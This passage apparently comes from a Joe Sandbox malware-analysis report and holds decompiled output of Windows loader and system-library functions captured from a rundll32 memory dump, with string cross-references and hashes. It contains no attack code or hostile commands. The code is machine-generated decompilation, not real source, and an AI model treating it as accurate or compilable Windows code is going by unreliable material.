                                                                                                                							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                                						} else {
                                                                                                                							_t82 = 0x7ffe0384;
                                                                                                                						}
                                                                                                                						_t108 = 0x7ffe0385;
                                                                                                                						if( *_t82 != 0) {
                                                                                                                							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                                                                								if(E04427D50() == 0) {
                                                                                                                									_t97 = 0x7ffe0385;
                                                                                                                								} else {
                                                                                                                									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                                                								}
                                                                                                                								if(( *_t97 & 0x00000020) != 0) {
                                                                                                                									E04487016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						if(_a4 != 0x40000003) {
                                                                                                                							L14:
                                                                                                                							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                                                                                                							if(E04427D50() != 0) {
                                                                                                                								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                                							} else {
                                                                                                                								_t87 = 0x7ffe0384;
                                                                                                                							}
                                                                                                                							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                                                                                								if(E04427D50() != 0) {
                                                                                                                									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                                                								}
                                                                                                                								if(( *_t108 & 0x00000020) != 0) {
                                                                                                                									E04487016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                                                                                                								}
                                                                                                                							}
                                                                                                                							goto L8;
                                                                                                                						} else {
                                                                                                                							_v16 = _t125 + 0x24;
                                                                                                                							_t124 = E0443A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                                                                                                							if(_t124 < 0) {
                                                                                                                								E0440B1E1(_t124, 0x1490, 0, _v16);
                                                                                                                								goto L8;
                                                                                                                							}
                                                                                                                							goto L14;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						goto L8;
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}




















                                                                                                                0x0446997e
                                                                                                                0x04469993
                                                                                                                0x04469993
                                                                                                                0x0446997e
                                                                                                                0x00000000
                                                                                                                0x04417ef2
                                                                                                                0x04417efc
                                                                                                                0x04417f0a
                                                                                                                0x04417f0e
                                                                                                                0x04469933
                                                                                                                0x00000000
                                                                                                                0x04469933
                                                                                                                0x00000000
                                                                                                                0x04417f0e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04417eb1

                                                                                                                Strings
                                                                                                                • LdrpCompleteMapModule, xrefs: 04469898
                                                                                                                • minkernel\ntdll\ldrmap.c, xrefs: 044698A2
                                                                                                                • Could not validate the crypto signature for DLL %wZ, xrefs: 04469891
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                • API String ID: 0-1676968949
                                                                                                                • Opcode ID: 2795b777a58b69ab8c83b51259c447348eba281540e6b6efe26677159c8808ec
                                                                                                                • Instruction ID: 06c103ea29f3815308f388186d046225aa269afdf6aadb1f936d0bad70891e25
                                                                                                                • Opcode Fuzzy Hash: 2795b777a58b69ab8c83b51259c447348eba281540e6b6efe26677159c8808ec
                                                                                                                • Instruction Fuzzy Hash: B651CD71A007449FEF21CF69C984B2ABBE4AB01314F14056BE8529B7E2D774FD01CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 93%
                                                                                                                			E0440E620(void* __ecx, short* __edx, short* _a4) {
                                                                                                                				char _v16;
                                                                                                                				char _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				char* _v28;
                                                                                                                				char _v32;
                                                                                                                				char _v36;
                                                                                                                				char _v44;
                                                                                                                				signed int _v48;
                                                                                                                				intOrPtr _v52;
                                                                                                                				void* _v56;
                                                                                                                				void* _v60;
                                                                                                                				char _v64;
                                                                                                                				void* _v68;
                                                                                                                				void* _v76;
                                                                                                                				void* _v84;
                                                                                                                				signed int _t59;
                                                                                                                				signed int _t74;
                                                                                                                				signed short* _t75;
                                                                                                                				signed int _t76;
                                                                                                                				signed short* _t78;
                                                                                                                				signed int _t83;
                                                                                                                				short* _t93;
                                                                                                                				signed short* _t94;
                                                                                                                				short* _t96;
                                                                                                                				void* _t97;
                                                                                                                				signed int _t99;
                                                                                                                				void* _t101;
                                                                                                                				void* _t102;
                                                                                                                
                                                                                                                				_t80 = __ecx;
                                                                                                                				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                                                                                                				_t96 = __edx;
                                                                                                                				_v44 = __edx;
                                                                                                                				_t78 = 0;
                                                                                                                				_v56 = 0;
                                                                                                                				if(__ecx == 0 || __edx == 0) {
                                                                                                                					L28:
                                                                                                                					_t97 = 0xc000000d;
                                                                                                                				} else {
                                                                                                                					_t93 = _a4;
                                                                                                                					if(_t93 == 0) {
                                                                                                                						goto L28;
                                                                                                                					}
                                                                                                                					_t78 = E0440F358(__ecx, 0xac);
                                                                                                                					if(_t78 == 0) {
                                                                                                                						_t97 = 0xc0000017;
                                                                                                                						L6:
                                                                                                                						if(_v56 != 0) {
                                                                                                                							_push(_v56);
                                                                                                                							E044495D0();
                                                                                                                						}
                                                                                                                						if(_t78 != 0) {
                                                                                                                							L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                                                                                                						}
                                                                                                                						return _t97;
                                                                                                                					}
                                                                                                                					E0444FA60(_t78, 0, 0x158);
                                                                                                                					_v48 = _v48 & 0x00000000;
                                                                                                                					_t102 = _t101 + 0xc;
                                                                                                                					 *_t96 = 0;
                                                                                                                					 *_t93 = 0;
                                                                                                                					E0444BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                                                                                                					_v36 = 0x18;
                                                                                                                					_v28 =  &_v44;
                                                                                                                					_v64 = 0;
                                                                                                                					_push( &_v36);
                                                                                                                					_push(0x20019);
                                                                                                                					_v32 = 0;
                                                                                                                					_push( &_v64);
                                                                                                                					_v24 = 0x40;
                                                                                                                					_v20 = 0;
                                                                                                                					_v16 = 0;
                                                                                                                					_t97 = E04449600();
                                                                                                                					if(_t97 < 0) {
                                                                                                                						goto L6;
                                                                                                                					}
                                                                                                                					E0444BB40(0,  &_v36, L"InstallLanguageFallback");
                                                                                                                					_push(0);
                                                                                                                					_v48 = 4;
                                                                                                                					_t97 = L0440F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                                                                                                					if(_t97 >= 0) {
                                                                                                                						if(_v52 != 1) {
                                                                                                                							L17:
                                                                                                                							_t97 = 0xc0000001;
                                                                                                                							goto L6;
                                                                                                                						}
                                                                                                                						_t59 =  *_t78 & 0x0000ffff;
                                                                                                                						_t94 = _t78;
                                                                                                                						_t83 = _t59;
                                                                                                                						if(_t59 == 0) {
                                                                                                                							L19:
                                                                                                                							if(_t83 == 0) {
                                                                                                                								L23:
                                                                                                                								E0444BB40(_t83, _t102 + 0x24, _t78);
                                                                                                                								if(L044143C0( &_v48,  &_v64) == 0) {
                                                                                                                									goto L17;
                                                                                                                								}
                                                                                                                								_t84 = _v48;
                                                                                                                								 *_v48 = _v56;
                                                                                                                								if( *_t94 != 0) {
                                                                                                                									E0444BB40(_t84, _t102 + 0x24, _t94);
                                                                                                                									if(L044143C0( &_v48,  &_v64) != 0) {
                                                                                                                										 *_a4 = _v56;
                                                                                                                									} else {
                                                                                                                										_t97 = 0xc0000001;
                                                                                                                										 *_v48 = 0;
                                                                                                                									}
                                                                                                                								}
                                                                                                                								goto L6;
                                                                                                                							}
                                                                                                                							_t83 = _t83 & 0x0000ffff;
                                                                                                                							while(_t83 == 0x20) {
                                                                                                                								_t94 =  &(_t94[1]);
                                                                                                                								_t74 =  *_t94 & 0x0000ffff;
                                                                                                                								_t83 = _t74;
                                                                                                                								if(_t74 != 0) {
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                								goto L23;
                                                                                                                							}
                                                                                                                							goto L23;
                                                                                                                						} else {
                                                                                                                							goto L14;
                                                                                                                						}
                                                                                                                						while(1) {
                                                                                                                							L14:
                                                                                                                							_t27 =  &(_t94[1]); // 0x2
                                                                                                                							_t75 = _t27;
                                                                                                                							if(_t83 == 0x2c) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							_t94 = _t75;
                                                                                                                							_t76 =  *_t94 & 0x0000ffff;
                                                                                                                							_t83 = _t76;
                                                                                                                							if(_t76 != 0) {
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                							goto L23;
                                                                                                                						}
                                                                                                                						 *_t94 = 0;
                                                                                                                						_t94 = _t75;
                                                                                                                						_t83 =  *_t75 & 0x0000ffff;
                                                                                                                						goto L19;
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}































                                                                                                                0x00000000
                                                                                                                0x0446545e
                                                                                                                0x0446543b
                                                                                                                0x0446543e
                                                                                                                0x04465440
                                                                                                                0x04465445
                                                                                                                0x04465472
                                                                                                                0x04465475
                                                                                                                0x0446548d
                                                                                                                0x04465493
                                                                                                                0x044654a9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044654ab
                                                                                                                0x044654b4
                                                                                                                0x044654bc
                                                                                                                0x044654c8
                                                                                                                0x044654de
                                                                                                                0x044654fb
                                                                                                                0x044654e0
                                                                                                                0x044654e6
                                                                                                                0x044654eb
                                                                                                                0x044654eb
                                                                                                                0x044654de
                                                                                                                0x00000000
                                                                                                                0x044654bc
                                                                                                                0x04465477
                                                                                                                0x0446547a
                                                                                                                0x04465480
                                                                                                                0x04465483
                                                                                                                0x04465486
                                                                                                                0x0446548b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0446548b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04465447
                                                                                                                0x04465447
                                                                                                                0x04465447
                                                                                                                0x04465447
                                                                                                                0x0446544e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04465450
                                                                                                                0x04465452
                                                                                                                0x04465455
                                                                                                                0x0446545a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0446545c
                                                                                                                0x0446546a
                                                                                                                0x0446546d
                                                                                                                0x0446546f
                                                                                                                0x00000000
                                                                                                                0x0446546f
                                                                                                                0x0440e70f

                                                                                                                Strings
                                                                                                                • InstallLanguageFallback, xrefs: 0440E6DB
                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0440E68C
                                                                                                                • @, xrefs: 0440E6C0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                                • API String ID: 0-1757540487
                                                                                                                • Opcode ID: d708e6d00f1afc1ccc027a7ddac4eaa2958a9aea5d119755283ec87d10329871
                                                                                                                • Instruction ID: 748f608c309116b4d2d5e190666e5033e0680c6e2e3932b885448ce3aef96f62
                                                                                                                • Opcode Fuzzy Hash: d708e6d00f1afc1ccc027a7ddac4eaa2958a9aea5d119755283ec87d10329871
                                                                                                                • Instruction Fuzzy Hash: 6A51A0B2508355ABDB20DF25D440B6BB3E8AF88714F04496FF986D7241FB34FA1487A2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 87%
                                                                                                                			E0441D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                                                                                                                				signed int _v8;
                                                                                                                				intOrPtr _v20;
                                                                                                                				signed int _v36;
                                                                                                                				intOrPtr* _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				signed char _v52;
                                                                                                                				signed int _v60;
                                                                                                                				signed int _v64;
                                                                                                                				signed int _v68;
                                                                                                                				signed int _v72;
                                                                                                                				signed int _v76;
                                                                                                                				intOrPtr _v80;
                                                                                                                				signed int _v84;
                                                                                                                				intOrPtr _v100;
                                                                                                                				intOrPtr _v104;
                                                                                                                				signed int _v108;
                                                                                                                				signed int _v112;
                                                                                                                				signed int _v116;
                                                                                                                				intOrPtr _v120;
                                                                                                                				signed int _v132;
                                                                                                                				char _v140;
                                                                                                                				char _v144;
                                                                                                                				char _v157;
                                                                                                                				signed int _v164;
                                                                                                                				signed int _v168;
                                                                                                                				signed int _v169;
                                                                                                                				intOrPtr _v176;
                                                                                                                				signed int _v180;
                                                                                                                				intOrPtr _v184;
                                                                                                                				intOrPtr _v188;
                                                                                                                				signed int _v192;
                                                                                                                				signed int _v200;
                                                                                                                				signed int _v208;
                                                                                                                				intOrPtr* _v212;
                                                                                                                				char _v216;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t204;
                                                                                                                				signed int _t206;
                                                                                                                				void* _t208;
                                                                                                                				signed int _t211;
                                                                                                                				signed int _t216;
                                                                                                                				intOrPtr _t217;
                                                                                                                				intOrPtr* _t218;
                                                                                                                				signed int _t226;
                                                                                                                				signed int _t239;
                                                                                                                				signed int* _t247;
                                                                                                                				signed int _t249;
                                                                                                                				void* _t252;
                                                                                                                				signed int _t256;
                                                                                                                				signed int _t269;
                                                                                                                				signed int _t271;
                                                                                                                				signed int _t277;
                                                                                                                				intOrPtr _t279;
                                                                                                                				intOrPtr _t283;
                                                                                                                				signed int _t287;
                                                                                                                				signed int _t288;
                                                                                                                				void* _t289;
                                                                                                                				signed char _t290;
                                                                                                                				signed int _t292;
                                                                                                                				signed int* _t293;
                                                                                                                				unsigned int _t297;
                                                                                                                				signed int _t306;
                                                                                                                				signed int _t307;
                                                                                                                				signed int _t308;
                                                                                                                				signed int _t309;
                                                                                                                				signed int _t310;
                                                                                                                				intOrPtr _t311;
                                                                                                                				intOrPtr _t312;
                                                                                                                				signed int _t319;
                                                                                                                				intOrPtr _t320;
                                                                                                                				signed int* _t324;
                                                                                                                				signed int _t337;
                                                                                                                				signed int _t338;
                                                                                                                				signed int _t339;
                                                                                                                				intOrPtr* _t340;
                                                                                                                				void* _t341;
                                                                                                                				signed int _t344;
                                                                                                                				signed int _t348;
                                                                                                                				signed int _t349;
                                                                                                                				signed int _t351;
                                                                                                                				intOrPtr _t353;
                                                                                                                				void* _t354;
                                                                                                                				signed int _t356;
                                                                                                                				signed int _t358;
                                                                                                                				intOrPtr _t359;
                                                                                                                				signed int _t361;
                                                                                                                				signed int _t363;
                                                                                                                				signed short* _t365;
                                                                                                                				void* _t367;
                                                                                                                				intOrPtr _t369;
                                                                                                                				void* _t370;
                                                                                                                				signed int _t371;
                                                                                                                				signed int _t372;
                                                                                                                				void* _t374;
                                                                                                                				signed int _t376;
                                                                                                                				void* _t384;
                                                                                                                				signed int _t387;
                                                                                                                
                                                                                                                				_v8 =  *0x44fd360 ^ _t376;
                                                                                                                				_t2 =  &_a20;
                                                                                                                				 *_t2 = _a20 & 0x00000001;
                                                                                                                				_t287 = _a4;
                                                                                                                				_v200 = _a12;
                                                                                                                				_t365 = _a8;
                                                                                                                				_v212 = _a16;
                                                                                                                				_v180 = _a24;
                                                                                                                				_v168 = 0;
                                                                                                                				_v157 = 0;
                                                                                                                				if( *_t2 != 0) {
                                                                                                                					__eflags = E04416600(0x44f52d8);
                                                                                                                					if(__eflags == 0) {
                                                                                                                						goto L1;
                                                                                                                					} else {
                                                                                                                						_v188 = 6;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					L1:
                                                                                                                					_v188 = 9;
                                                                                                                				}
                                                                                                                				if(_t365 == 0) {
                                                                                                                					_v164 = 0;
                                                                                                                					goto L5;
                                                                                                                				} else {
                                                                                                                					_t363 =  *_t365 & 0x0000ffff;
                                                                                                                					_t341 = _t363 + 1;
                                                                                                                					if((_t365[1] & 0x0000ffff) < _t341) {
                                                                                                                						L109:
                                                                                                                						__eflags = _t341 - 0x80;
                                                                                                                						if(_t341 <= 0x80) {
                                                                                                                							_t281 =  &_v140;
                                                                                                                							_v164 =  &_v140;
                                                                                                                							goto L114;
                                                                                                                						} else {
                                                                                                                							_t283 =  *0x44f7b9c; // 0x0
                                                                                                                							_t281 = L04424620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                                                                                                                							_v164 = _t281;
                                                                                                                							__eflags = _t281;
                                                                                                                							if(_t281 != 0) {
                                                                                                                								_v157 = 1;
                                                                                                                								L114:
                                                                                                                								E0444F3E0(_t281, _t365[2], _t363);
                                                                                                                								_t200 = _v164;
                                                                                                                								 *((char*)(_v164 + _t363)) = 0;
                                                                                                                								goto L5;
                                                                                                                							} else {
                                                                                                                								_t204 = 0xc000009a;
                                                                                                                								goto L47;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_t200 = _t365[2];
                                                                                                                						_v164 = _t200;
                                                                                                                						if( *((char*)(_t200 + _t363)) != 0) {
                                                                                                                							goto L109;
                                                                                                                						} else {
                                                                                                                							while(1) {
                                                                                                                								L5:
                                                                                                                								_t353 = 0;
                                                                                                                								_t342 = 0x1000;
                                                                                                                								_v176 = 0;
                                                                                                                								if(_t287 == 0) {
                                                                                                                									break;
                                                                                                                								}
                                                                                                                								_t384 = _t287 -  *0x44f7b90; // 0x77d00000
                                                                                                                								if(_t384 == 0) {
                                                                                                                									_t353 =  *0x44f7b8c; // 0x3529e8
                                                                                                                									_v176 = _t353;
                                                                                                                									_t63 = _t353 + 0x50; // 0x352a98
                                                                                                                									_t64 =  *_t63 + 0x20; // 0x9
                                                                                                                									_t320 =  *_t64;
                                                                                                                									_v184 = _t320;
                                                                                                                								} else {
                                                                                                                									E04422280(_t200, 0x44f84d8);
                                                                                                                									_t277 =  *0x44f85f4; // 0x355c58
                                                                                                                									_t351 =  *0x44f85f8 & 1;
                                                                                                                									while(_t277 != 0) {
                                                                                                                										_t21 = _t277 - 0x50; // 0x76180000
                                                                                                                										_t337 =  *_t21;
                                                                                                                										if(_t337 > _t287) {
                                                                                                                											_t338 = _t337 | 0xffffffff;
                                                                                                                										} else {
                                                                                                                											asm("sbb ecx, ecx");
                                                                                                                											_t338 =  ~_t337;
                                                                                                                										}
                                                                                                                										_t387 = _t338;
                                                                                                                										if(_t387 < 0) {
                                                                                                                											_t339 =  *_t277;
                                                                                                                											__eflags = _t351;
                                                                                                                											if(_t351 != 0) {
                                                                                                                												__eflags = _t339;
                                                                                                                												if(_t339 == 0) {
                                                                                                                													goto L16;
                                                                                                                												} else {
                                                                                                                													goto L118;
                                                                                                                												}
                                                                                                                												goto L151;
                                                                                                                											} else {
                                                                                                                												goto L16;
                                                                                                                											}
                                                                                                                											goto L17;
                                                                                                                										} else {
                                                                                                                											if(_t387 <= 0) {
                                                                                                                												__eflags = _t277;
                                                                                                                												if(_t277 != 0) {
                                                                                                                													_t23 = _t277 - 0x18; // 0x355ca0
                                                                                                                													_t340 =  *_t23;
                                                                                                                													_t24 = _t277 - 0x68; // 0x355bf0
                                                                                                                													_t353 = _t24;
                                                                                                                													_v176 = _t353;
                                                                                                                													__eflags =  *((intOrPtr*)(_t340 + 0xc)) - 0xffffffff;
                                                                                                                													if( *((intOrPtr*)(_t340 + 0xc)) != 0xffffffff) {
                                                                                                                														_t279 =  *_t340;
                                                                                                                														__eflags =  *(_t279 - 0x20) & 0x00000020;
                                                                                                                														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                                                                                                                															asm("lock inc dword [edi+0x9c]");
                                                                                                                															_t30 = _t353 + 0x50; // 0x355ca0
                                                                                                                															_t340 =  *_t30;
                                                                                                                														}
                                                                                                                													}
                                                                                                                													_t31 = _t340 + 0x20; // 0x9
                                                                                                                													_v184 =  *_t31;
                                                                                                                												}
                                                                                                                											} else {
                                                                                                                												_t22 = _t277 + 4; // 0x355e98
                                                                                                                												_t339 =  *_t22;
                                                                                                                												if(_t351 != 0) {
                                                                                                                													__eflags = _t339;
                                                                                                                													if(_t339 == 0) {
                                                                                                                														goto L16;
                                                                                                                													} else {
                                                                                                                														L118:
                                                                                                                														_t277 = _t277 ^ _t339;
                                                                                                                														goto L17;
                                                                                                                													}
                                                                                                                													goto L151;
                                                                                                                												} else {
                                                                                                                													L16:
                                                                                                                													_t277 = _t339;
                                                                                                                												}
                                                                                                                												goto L17;
                                                                                                                											}
                                                                                                                										}
                                                                                                                										goto L25;
                                                                                                                										L17:
                                                                                                                									}
                                                                                                                									L25:
                                                                                                                									E0441FFB0(_t287, _t353, 0x44f84d8);
                                                                                                                									_t320 = _v184;
                                                                                                                									_t342 = 0x1000;
                                                                                                                								}
                                                                                                                								if(_t353 == 0) {
                                                                                                                									break;
                                                                                                                								} else {
                                                                                                                									_t366 = 0;
                                                                                                                									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                                                                                                                										_t288 = _v164;
                                                                                                                										if(_t353 != 0) {
                                                                                                                											_t342 = _t288;
                                                                                                                											_t374 = E0445CC99(_t353, _t288, _v200, 1,  &_v168);
                                                                                                                											if(_t374 >= 0) {
                                                                                                                												if(_v184 == 7) {
                                                                                                                													__eflags = _a20;
                                                                                                                													if(__eflags == 0) {
                                                                                                                														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                                                                                                                														if(__eflags != 0) {
                                                                                                                															_t271 = E04416600(0x44f52d8);
                                                                                                                															__eflags = _t271;
                                                                                                                															if(__eflags == 0) {
                                                                                                                																_t342 = 0;
                                                                                                                																_v169 = _t271;
                                                                                                                																_t374 = E04417926( *(_t353 + 0x50), 0,  &_v169);
                                                                                                                															}
                                                                                                                														}
                                                                                                                													}
                                                                                                                												}
                                                                                                                												if(_t374 < 0) {
                                                                                                                													_v168 = 0;
                                                                                                                												} else {
                                                                                                                													if( *0x44fb239 != 0) {
                                                                                                                														_t342 =  *(_t353 + 0x18);
                                                                                                                														E0448E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                                                                                                                													}
                                                                                                                													if( *0x44f8472 != 0) {
                                                                                                                														_v192 = 0;
                                                                                                                														_t342 =  *0x7ffe0330;
                                                                                                                														_t361 =  *0x44fb218; // 0xe690506
                                                                                                                														asm("ror edi, cl");
                                                                                                                														 *0x44fb1e0( &_v192, _t353, _v168, 0, _v180);
                                                                                                                														 *(_t361 ^  *0x7ffe0330)();
                                                                                                                														_t269 = _v192;
                                                                                                                														_t353 = _v176;
                                                                                                                														__eflags = _t269;
                                                                                                                														if(__eflags != 0) {
                                                                                                                															_v168 = _t269;
                                                                                                                														}
                                                                                                                													}
                                                                                                                												}
                                                                                                                											}
                                                                                                                											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                                                                                                                												_t366 = 0xc000007a;
                                                                                                                											}
                                                                                                                											_t247 =  *(_t353 + 0x50);
                                                                                                                											if(_t247[3] == 0xffffffff) {
                                                                                                                												L40:
                                                                                                                												if(_t366 == 0xc000007a) {
                                                                                                                													__eflags = _t288;
                                                                                                                													if(_t288 == 0) {
                                                                                                                														goto L136;
                                                                                                                													} else {
                                                                                                                														_t366 = 0xc0000139;
                                                                                                                													}
                                                                                                                													goto L54;
                                                                                                                												}
                                                                                                                											} else {
                                                                                                                												_t249 =  *_t247;
                                                                                                                												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                                                                                                                													goto L40;
                                                                                                                												} else {
                                                                                                                													_t250 = _t249 | 0xffffffff;
                                                                                                                													asm("lock xadd [edi+0x9c], eax");
                                                                                                                													if((_t249 | 0xffffffff) == 0) {
                                                                                                                														E04422280(_t250, 0x44f84d8);
                                                                                                                														_t342 =  *(_t353 + 0x54);
                                                                                                                														_t165 = _t353 + 0x54; // 0x54
                                                                                                                														_t252 = _t165;
                                                                                                                														__eflags =  *(_t342 + 4) - _t252;
                                                                                                                														if( *(_t342 + 4) != _t252) {
                                                                                                                															L135:
                                                                                                                															asm("int 0x29");
                                                                                                                															L136:
                                                                                                                															_t288 = _v200;
                                                                                                                															_t366 = 0xc0000138;
                                                                                                                															L54:
                                                                                                                															_t342 = _t288;
                                                                                                                															L04443898(0, _t288, _t366);
                                                                                                                														} else {
                                                                                                                															_t324 =  *(_t252 + 4);
                                                                                                                															__eflags =  *_t324 - _t252;
                                                                                                                															if( *_t324 != _t252) {
                                                                                                                																goto L135;
                                                                                                                															} else {
                                                                                                                																 *_t324 = _t342;
                                                                                                                																 *(_t342 + 4) = _t324;
                                                                                                                																_t293 =  *(_t353 + 0x50);
                                                                                                                																_v180 =  *_t293;
                                                                                                                																E0441FFB0(_t293, _t353, 0x44f84d8);
                                                                                                                																__eflags =  *((short*)(_t353 + 0x3a));
                                                                                                                																if( *((short*)(_t353 + 0x3a)) != 0) {
                                                                                                                																	_t342 = 0;
                                                                                                                																	__eflags = 0;
                                                                                                                																	E044437F5(_t353, 0);
                                                                                                                																}
                                                                                                                																E04440413(_t353);
                                                                                                                																_t256 =  *(_t353 + 0x48);
                                                                                                                																__eflags = _t256;
                                                                                                                																if(_t256 != 0) {
                                                                                                                																	__eflags = _t256 - 0xffffffff;
                                                                                                                																	if(_t256 != 0xffffffff) {
                                                                                                                																		E04439B10(_t256);
                                                                                                                																	}
                                                                                                                																}
                                                                                                                																__eflags =  *(_t353 + 0x28);
                                                                                                                																if( *(_t353 + 0x28) != 0) {
                                                                                                                																	_t174 = _t353 + 0x24; // 0x24
                                                                                                                																	E044302D6(_t174);
                                                                                                                																}
                                                                                                                																L044277F0( *0x44f7b98, 0, _t353);
                                                                                                                																__eflags = _v180 - _t293;
                                                                                                                																if(__eflags == 0) {
                                                                                                                																	E0443C277(_t293, _t366);
                                                                                                                																}
                                                                                                                																_t288 = _v164;
                                                                                                                																goto L40;
                                                                                                                															}
                                                                                                                														}
                                                                                                                													} else {
                                                                                                                														goto L40;
                                                                                                                													}
                                                                                                                												}
                                                                                                                											}
                                                                                                                										}
                                                                                                                									} else {
                                                                                                                										L0441EC7F(_t353);
                                                                                                                										L044319B8(_t287, 0, _t353, 0);
                                                                                                                										_t200 = E0440F4E3(__eflags);
                                                                                                                										continue;
                                                                                                                									}
                                                                                                                								}
                                                                                                                								L41:
                                                                                                                								if(_v157 != 0) {
                                                                                                                									L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                                                                                                                								}
                                                                                                                								if(_t366 < 0) {
                                                                                                                									L46:
                                                                                                                									 *_v212 = _v168;
                                                                                                                									_t204 = _t366;
                                                                                                                									L47:
                                                                                                                									_pop(_t354);
                                                                                                                									_pop(_t367);
                                                                                                                									_pop(_t289);
                                                                                                                									return E0444B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                                                                                                                								} else {
                                                                                                                									_t206 =  *0x44fb2f8; // 0x750000
                                                                                                                									if((_t206 |  *0x44fb2fc) == 0 || ( *0x44fb2e4 & 0x00000001) != 0) {
                                                                                                                										goto L46;
                                                                                                                									} else {
                                                                                                                										_t297 =  *0x44fb2ec; // 0x100
                                                                                                                										_v200 = 0;
                                                                                                                										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
                                                                                                                											_t355 = _v168;
                                                                                                                											_t342 =  &_v208;
                                                                                                                											_t208 = E044B6B68(_v168,  &_v208, _v168, __eflags);
                                                                                                                											__eflags = _t208 - 1;
                                                                                                                											if(_t208 == 1) {
                                                                                                                												goto L46;
                                                                                                                											} else {
                                                                                                                												__eflags = _v208 & 0x00000010;
                                                                                                                												if((_v208 & 0x00000010) == 0) {
                                                                                                                													goto L46;
                                                                                                                												} else {
                                                                                                                													_t342 = 4;
                                                                                                                													_t366 = E044B6AEB(_t355, 4,  &_v216);
                                                                                                                													__eflags = _t366;
                                                                                                                													if(_t366 >= 0) {
                                                                                                                														goto L46;
                                                                                                                													} else {
                                                                                                                														asm("int 0x29");
                                                                                                                														_t356 = 0;
                                                                                                                														_v44 = 0;
                                                                                                                														_t290 = _v52;
                                                                                                                														__eflags = 0;
                                                                                                                														if(0 == 0) {
                                                                                                                															L108:
                                                                                                                															_t356 = 0;
                                                                                                                															_v44 = 0;
                                                                                                                															goto L63;
                                                                                                                														} else {
                                                                                                                															__eflags = 0;
                                                                                                                															if(0 < 0) {
                                                                                                                																goto L108;
                                                                                                                															}
                                                                                                                															L63:
                                                                                                                															_v112 = _t356;
                                                                                                                															__eflags = _t356;
                                                                                                                															if(_t356 == 0) {
